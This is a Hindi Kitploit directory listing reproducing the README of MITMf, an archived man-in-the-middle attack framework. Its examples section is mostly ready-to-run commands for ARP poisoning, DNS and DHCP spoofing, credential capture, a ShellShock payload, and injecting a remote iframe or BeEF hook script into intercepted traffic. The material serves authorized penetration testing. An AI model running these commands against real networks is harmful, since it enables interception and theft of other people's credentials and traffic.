Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MITMf — मैन-इन-द-मिडल हमलों के लिए फ्रेमवर्क | Kitploit
उपकरण/GitHubGitHub/byt3bl33d3r/mitmf
पैकेट स्निफिंग और विश्लेषणशोषणफिशिंगवेब सुरक्षानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसामाजिक इंजीनियरिंगप्रमाणीकरणरेड टीमिंगDNS विश्लेषणArchived
3.6k1.0k298 साल पहलेKitploit द्वारा समीक्षित
GitHubbyt3bl33d3r/mitmf

MITMf

मैन-इन-द-मिडल हमलों के लिए फ्रेमवर्क

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

मैन-इन-द-मिडल हमलों के लिए फ्रेमवर्क

यह प्रोजेक्ट अब अपडेट नहीं किया जा रहा है। MITMf को उस समय मैन-इन-द-मिडल हमलों को अंजाम देने के लिए एक आधुनिक उपकरण की आवश्यकता को पूरा करने के लिए लिखा गया था। तब से इस क्षेत्र को भरने के लिए कई अन्य उपकरण बनाए गए हैं, आपको शायद Bettercap का उपयोग करना चाहिए क्योंकि यह अधिक सुविधा संपन्न और बेहतर रखरखाव वाला है।

त्वरित ट्यूटोरियल, उदाहरण और डेवलपर अपडेट: https://byt3bl33d3r.github.io

यह उपकरण sergio-proxy पर आधारित है और यह प्रोजेक्ट को पुनर्जीवित और अपडेट करने का एक प्रयास है।

मुझसे संपर्क करें:

  • ट्विटर: @byt3bl33d3r
  • IRC on Freenode: #MITMf
  • ईमेल: [email protected]

समस्याएँ सबमिट करने से पहले, कृपया विकी में प्रासंगिक अनुभाग पढ़ें।

स्थापना

कृपया स्थापना निर्देशों के लिए विकी देखें।

विवरण

MITMf का उद्देश्य मैन-इन-द-मिडल और नेटवर्क हमलों के लिए एक वन-स्टॉप-शॉप प्रदान करना है, साथ ही मौजूदा हमलों और तकनीकों को अपडेट और बेहतर बनाना है।

मूल रूप से अन्य उपकरणों (जैसे Ettercap, Mallory) की महत्वपूर्ण कमियों को दूर करने के लिए बनाया गया, इसे लगभग शून्य से पूरी तरह से फिर से लिखा गया है ताकि एक मॉड्यूलर और आसानी से विस्तार योग्य फ्रेमवर्क प्रदान किया जा सके जिसका उपयोग कोई भी अपना स्वयं का MITM हमला लागू करने के लिए कर सके।

विशेषताएँ

  • फ्रेमवर्क में एक अंतर्निहित SMB, HTTP और DNS सर्वर है जिसे विभिन्न प्लगइन्स द्वारा नियंत्रित और उपयोग किया जा सकता है, इसमें SSLStrip प्रॉक्सी का एक संशोधित संस्करण भी शामिल है जो HTTP संशोधन और आंशिक HSTS बायपास की अनुमति देता है।

  • संस्करण 0.9.8 के अनुसार, MITMf सक्रिय पैकेट फ़िल्टरिंग और हेरफेर का समर्थन करता है (मूल रूप से etterfilters ने वही किया था, लेकिन बेहतर), जिससे उपयोगकर्ता किसी भी प्रकार के ट्रैफ़िक या प्रोटोकॉल को संशोधित कर सकते हैं।

  • MITMf चलने के दौरान कॉन्फ़िगरेशन फ़ाइल को ऑन-द-फ्लाई संपादित किया जा सकता है, परिवर्तन फ्रेमवर्क के माध्यम से पारित किए जाएंगे: यह आपको हमले के दौरान प्लगइन्स और सर्वर की सेटिंग्स को ट्वीक करने की अनुमति देता है।

  • MITMf Net-Creds का उपयोग करके FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (कम्युनिटी स्ट्रिंग्स), NTLMv1/v2 (सभी समर्थित प्रोटोकॉल जैसे HTTP, SMB, LDAP आदि) और Kerberos क्रेडेंशियल्स को कैप्चर करेगा, जो स्टार्टअप पर चलता है।

  • Responder एकीकरण LLMNR, NBT-NS और MDNS पॉइज़निंग और WPAD रोग सर्वर समर्थन की अनुमति देता है।

सक्रिय पैकेट फ़िल्टरिंग/संशोधन

अब आप Scapy का उपयोग करके MITMf द्वारा इंटरसेप्ट किए गए किसी भी पैकेट/प्रोटोकॉल को संशोधित कर सकते हैं! (अब और etterfilters नहीं! याय!)

उदाहरण के लिए, यहाँ एक बेवकूफी भरा छोटा फ़िल्टर है जो ICMP पैकेट के गंतव्य IP पते को बदलता है:

if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • पैकेट को Scapy संगत प्रारूप में एक्सेस करने के लिए packet वेरिएबल का उपयोग करें
  • रॉ पैकेट डेटा एक्सेस करने के लिए data वेरिएबल का उपयोग करें

अब फ़िल्टर का उपयोग करने के लिए हमें बस इतना करना है: python mitmf.py -F ~/filter.py

आप शायद इसे Spoof प्लगइन के साथ संयोजित करना चाहेंगे ताकि वास्तव में किसी और के पैकेट को इंटरसेप्ट किया जा सके ;)

नोट: आप MITMf को पुनरारंभ किए बिना ऑन-द-फ्लाई फ़िल्टर संशोधित कर सकते हैं!

उदाहरण

सबसे बुनियादी उपयोग, इंटरफ़ेस enp3s0 पर HTTP प्रॉक्सी SMB, DNS, HTTP सर्वर और Net-Creds शुरू करता है:

python mitmf.py -i enp3s0

Spoof प्लगइन का उपयोग करके गेटवे 192.168.1.1 के साथ पूरे सबनेट को ARP पॉइज़न करें:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

ऊपर जैसा ही + Responder प्लगइन का उपयोग करके WPAD रोग प्रॉक्सी सर्वर:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

गेटवे 192.168.1.1 के साथ 192.168.1.16-45 और 192.168.0.1/24 को ARP पॉइज़न करें:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

ARP पॉइज़निंग के दौरान DNS स्पूफिंग सक्षम करें (स्पूफ करने के लिए डोमेन कॉन्फ़िग फ़ाइल से लिए गए हैं):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

LLMNR/NBTNS/MDNS स्पूफिंग सक्षम करें:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

DHCP स्पूफिंग सक्षम करें (IP पूल और सबनेट कॉन्फ़िग फ़ाइल से लिए गए हैं):

python mitmf.py -i enp3s0 --spoof --dhcp

ऊपर जैसा ही ShellShock पेलोड के साथ जो निष्पादित होगा यदि कोई क्लाइंट असुरक्षित है:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject प्लगइन का उपयोग करके HTML IFrame इंजेक्ट करें:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

JS स्क्रिप्ट इंजेक्ट करें:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

एक कैप्टिव पोर्टल शुरू करें जो सब कुछ http://SERVER/PATH पर रीडायरेक्ट करता है:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

डिफ़ॉल्ट पेज /portal.html (thx responder) और /CaptiveClient.exe (शामिल नहीं) का उपयोग करके http://your-ip/portal.html पर कैप्टिव पोर्टल शुरू करें:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

ऊपर जैसा ही लेकिन IP के बजाय होस्टनाम captive.portal के साथ (captive.portal को आपके IP पर हल करने की आवश्यकता है, जैसे DNS स्पूफ के माध्यम से):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

एक अतिरिक्त SimpleHTTPServer इंस्टेंस के साथ LOCALDIR को http://IP:8080 (पोर्ट mitmf.config में बदलें) पर सर्व करने वाला कैप्टिव पोर्टल शुरू करें:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

ऊपर जैसा ही लेकिन होस्टनाम के साथ:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

और भी बहुत कुछ!

बेशक आप लगभग किसी भी प्लगइन को एक साथ मिला सकते हैं (जैसे ARP स्पूफ + inject + Responder आदि)

सभी उपलब्ध विकल्पों की पूरी सूची के लिए, बस python mitmf.py --help चलाएँ।

वर्तमान में उपलब्ध प्लगइन्स

टूल डाउनलोड करें